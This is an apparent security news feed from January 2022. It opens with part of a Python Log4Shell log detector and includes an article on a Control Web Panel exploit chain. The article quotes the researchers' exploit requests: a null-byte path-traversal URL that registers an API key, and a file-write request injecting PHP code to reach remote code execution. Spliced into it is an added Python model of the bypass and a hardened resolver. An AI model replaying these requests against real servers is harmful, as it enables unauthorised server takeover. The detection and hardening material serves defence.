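        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep:
        n = name.strip().lower()
        if n == "lower":
            return arg.lower()
        if n == "upper":
            return arg.upper()
    # env:, sys:, date: and jndi: itself cannot be resolved offline; leave as-is.
    return m.group(0)


def normalize(s: str, max_rounds: int = 20) -> str:
    """URL-decode, then repeatedly resolve innermost lookups until nothing changes.
    Each round removes at least one resolvable lookup, so this terminates; the
    cap only guards against pathological input."""
    s = unquote(s)
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, s)
        if new == s:
            break
        s = new
    return s


def find_log4shell(lines):
    """Return (line_number, normalized_line) for every line that, after
    de-obfuscation, contains a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((lineno, norm))
    return hits


if __name__ == "__main__":
    for lineno, norm in find_log4shell(SAMPLE_LOG):
        print(f"line {lineno}: {norm}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines; because the match happens on the normalized string, a hit's normalized form also tells you where the callback (the ldap:// or rmi:// host) was pointed. A line that contains other unresolved "${...}" lookups without jndi (line 5 here) is not reported, which is the intended false-positive trade-off; tighten the rule if your applications never log user-controlled text containing "${".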


Pierluigi Paganini

(SecurityAffairs – hacking, log4j)

The post Pay attention to Log4j attacks, Dutch National Cybersecurity Centre (NCSC) warns appeared first on Security Affairs.

Vulnerabilities in Control Web Panel potentially expose Linux Servers to hack

22 January 2022 at 16:29

Two critical security vulnerabilities in Control Web Panel potentially expose Linux servers to remote code execution attacks.

Researchers from Octagon Networks disclosed details of two critical security flaws in Control Web Panel that potentially expose Linux servers to remote code execution attacks.

Control Web Panel (formerly CentOS Web Panel) is a popular free Linux control panel for servers and VPS that simplifies the management of web hosting environments.

An attacker could chain the vulnerabilities to achieve pre-authenticated remote code execution on vulnerable Linux servers.

The first issue, tracked as CVE-2021-45467, is a file inclusion vulnerability that occurs when a web application is tricked into exposing or running arbitrary files on the webserver.

The experts focused their analysis on vulnerabilities that can be exploited by unauthenticated users or through zero-click attacks; in particular, they tested the sections of the panel that are exposed without authentication in the webroot, including /user/loader.php and /user/index.php.

Paulos Yibelo of Octagon Networks discovered that several PHP functions (including require() and include()) seem to process /.%00./ as /../. The protections implemented in the application do not allow switching to a parent directory (using ".."), but the PHP interpreter accepts a specially crafted string such as ".%00." that bypasses the restriction.

Similarly, while stristr() ignores the null byte, it still counts its size, so the ".." check is bypassed.

This means that it is possible to include any file on the server; if an attacker also finds a way to write to a file, they can get pre-auth RCE.
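To make the bypass concrete, here is an added example that models the two-stage flaw in Python. It is my illustration, not Octagon Networks' proof of concept and not CWP's code: a filter that rejects a literal ".." in the decoded parameter, and a consumer that, as the article describes for PHP's include(), effectively drops the embedded null byte before resolving the path (that dropping is modeled with a plain .replace(), an assumption about the mechanism rather than a reimplementation of PHP). The hardened resolver beside it decodes first, refuses NUL bytes outright, canonicalizes with realpath and confines the result to the web root, so the same payload is rejected.

```python
import os
import tempfile
from urllib.parse import unquote

# Payload from the Octagon Networks write-up quoted on this page: two traversal
# steps with a null byte between the dots, so ".." never appears literally.
PAYLOAD = ".%00./.%00./api/account_new_create"


def naive_traversal_check(scripts: str) -> bool:
    """Models the CWP-style filter: it only rejects a literal '..' in the
    URL-decoded value, so '.\\x00.' passes. Returns True when the value is allowed."""
    return ".." not in unquote(scripts)


def path_as_loader_sees_it(scripts: str) -> str:
    """Models what the article says happens inside include(): the NUL disappears
    and the two dots become a real parent-directory step. (Assumption for the
    model; the real mechanism is inside the PHP interpreter.)"""
    return unquote(scripts).replace("\x00", "")


def safe_resolve(webroot: str, scripts: str):
    """Hardened version: decode, refuse NUL bytes, canonicalize, confine to webroot.
    Returns the absolute target path, or None when the request is rejected."""
    decoded = unquote(scripts)
    if "\x00" in decoded:
        return None  # a NUL byte is never legitimate in a path component
    root = os.path.realpath(webroot)
    target = os.path.realpath(os.path.join(root, decoded))
    if os.path.commonpath([root, target]) != root:
        return None  # resolved path escaped the web root
    return target


def demo():
    """Exercise both checks against the payload in a throwaway directory tree
    (tmp/user as the webroot, tmp/api beside it) and return the observations."""
    with tempfile.TemporaryDirectory() as tmp:
        webroot = os.path.join(tmp, "user")
        os.makedirs(os.path.join(tmp, "api"))
        os.makedirs(webroot)
        effective = path_as_loader_sees_it(PAYLOAD)
        return {
            # the filter sees ".\x00./.\x00./..." and finds no ".."
            "naive_allows": naive_traversal_check(PAYLOAD),
            # what the loader actually resolves after the NUL is gone
            "effective_path": effective,
            # the same filter would have caught the effective path, had it
            # been applied after normalization instead of before
            "naive_allows_effective_path": naive_traversal_check(effective),
            # hardened resolver rejects the payload ...
            "safe_result": safe_resolve(webroot, PAYLOAD),
            # ... and still serves a benign file under the webroot
            "safe_benign": safe_resolve(webroot, "index.php")
            == os.path.join(os.path.realpath(webroot), "index.php"),
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

The lesson the model isolates is ordering: the application validated the raw parameter and then handed a different string to the filesystem layer. Any deny-list check run before decoding and canonicalization is bypassable by whatever transformation happens afterwards; validate the final, canonical path, and reject control bytes unconditionally.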

Despite the Unix file read/write permission settings in CWP, an attacker can exploit the file inclusion bug to reach the restricted API section, which requires an API key and is not exposed in the webroot.

By chaining this flaw with an arbitrary file write vulnerability such as CVE-2021-45466, an attacker can gain full remote code execution on the server.

“But by using our file inclusion, sending a request like the following will result in the server registering any API key we want.” explained the expert.

GET https://CWP/user/loader.php?api=1&scripts= .%00./.%00./api/account_new_create&acc=guadaapi&ip=192.168.1.1&keyapi=OCTAGON

“Now we have added the api key “OCTAGON” requesting from 192.168.1.1 to have access to the full API like the following:

GET https://CWP/api/?key=OCTAGON&api=add_server is now a valid API request.”

The expert then found a file write bug in the API section that allowed him to write to a file on the server, for example by using the maliciously added key:

https://CWP/api/?key=OCTAGON&api=add_server&DHCP=<?=phpinfo()?>&fileFinal=/

That request writes to a file called authorized_keys located in the /resources/ folder. Then, using the first file inclusion bug, the expert includes the malicious authorized_keys file to get full RCE.

The CWP maintainers have already addressed the flaw with security updates released this month.


Pierluigi Paganini

(SecurityAffairs – hacking, Control Web Panel)

The post Vulnerabilities in Control Web Panel potentially expose Linux Servers to hack appeared first on Security Affairs.

Experts Find Strategic Similarities b/w NotPetya and WhisperGate Attacks on Ukraine

22 January 2022 at 14:47
Latest analysis into the wiper malware that targeted dozens of Ukrainian agencies earlier this month has revealed "strategic similarities" to NotPetya malware that was unleashed against the country's infrastructure and elsewhere in 2017. The malware, dubbed WhisperGate, was discovered by Microsoft last week, which said it observed the destructive cyber campaign targeting government, non-profit,

US Treasury Department sanctions 4 Ukrainian officials for working with Russian intelligence

22 January 2022 at 13:20

The U.S. Treasury Department announced sanctions against four current and former Ukrainian government officials for collaborating with Russia.

The U.S. Treasury Department this week announced sanctions against four current and former Ukrainian government officials for having supported influence activities carried out by the Russian government. The officials are accused of having gathered sensitive information about critical infrastructure in Ukraine.

“Today, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned four individuals engaged in Russian government-directed influence activities to destabilize Ukraine.” reads the press release published by U.S. Treasury Department. “This action is separate and distinct from the broad range of high impact measures the United States and its Allies and partners are prepared to impose in order to inflict significant costs on the Russian economy and financial system if it were to further invade Ukraine.”

According to the US agency, Russia’s security service, the Federal Security Service (FSB), recruited Ukrainian citizens in key positions to destabilize the country’s political and social situation.

The four individuals played different roles in supporting the Russian influence campaign.

Two of the four individuals, Taras Kozak and Oleh Voloshyn, who are two current Ukrainian Members of Parliament from the party led by Victor Medvedchuk (Medvedchuk), supported Russian disinformation by amplifying false narratives and undermining Ukrainian sovereignty.

Kozak controls several news channels in Ukraine and is accused of having supported the Russian intelligence to denigrate senior members of Ukrainian President Volodymyr Zelenskyy’s inner circle, accusing them of mismanagement of the COVID-19 pandemic.

Voloshyn has worked with Russia-linked actors to undermine Ukrainian government officials and advocate on behalf of Russia.

Vladimir Sivkovich, former Deputy Secretary of the Ukrainian National Security and Defense Council, supported Russian intelligence in carrying out influence operations to support the decision for Ukraine to officially cede Crimea to Russia in exchange for a drawdown of Russian-backed forces in the Donbas.

Volodymyr Oliynyk is a former Ukrainian official who currently resides in Moscow. He shares Russia’s anti-Western sentiments and in 2021 he worked for the FSB to gather information about Ukrainian critical infrastructure.

“As Russia has pursued broad cyber operations against critical infrastructure, it has focused on disrupting one critical infrastructure sector in particular: Ukraine’s energy sector. Russia has also degraded Ukraine’s access to energy products in the middle of winter. Acting” continues the Treasury Department.

The US agency ordered to block all property and interests in property of the designated individuals described above that are in the United States or in the possession or control of U.S. persons. Any entities that are owned, directly or indirectly, 50 percent or more by one or more blocked persons are also blocked. 

“The prohibitions include the making of any contribution or provision of funds, goods, or services by, to, or for the benefit of any blocked person, or the receipt of any contribution or provision of funds, goods, or services from any such person.” concludes the agency.


Pierluigi Paganini

(SecurityAffairs – hacking, FSB)

The post US Treasury Department sanctions 4 Ukrainian officials for working with Russian intelligence appeared first on Security Affairs.

Molerats Hackers Hiding New Espionage Attacks Behind Public Cloud Infrastructure

22 January 2022 at 10:57
An active espionage campaign has been attributed to the threat actor known as Molerats that abuses legitimate cloud services like Google Drive and Dropbox to host malware payloads and for command-and-control and the exfiltration of data from targets across the Middle East. The cyber offensive is believed to have been underway since at least July 2021, according to cloud-based information

Hackers Planted Secret Backdoor in Dozens of WordPress Plugins and Themes

22 January 2022 at 07:13
In yet another instance of software supply chain attack, dozens of WordPress themes and plugins hosted on a developer's website were backdoored with malicious code in the first half of September 2021 with the goal of infecting further sites. The backdoor gave the attackers full administrative control over websites that used 40 themes and 53 plugins belonging to AccessPress Themes, a Nepal-based

Critical Bugs in Control Web Panel Expose Linux Servers to RCE Attacks

22 January 2022 at 04:04
Researchers have disclosed details of two critical security vulnerabilities in Control Web Panel that could be abused as part of an exploit chain to achieve pre-authenticated remote code execution on affected servers. Tracked as CVE-2021-45467, the issue concerns a case of a file inclusion vulnerability, which occurs when a web application is tricked into exposing or running arbitrary files on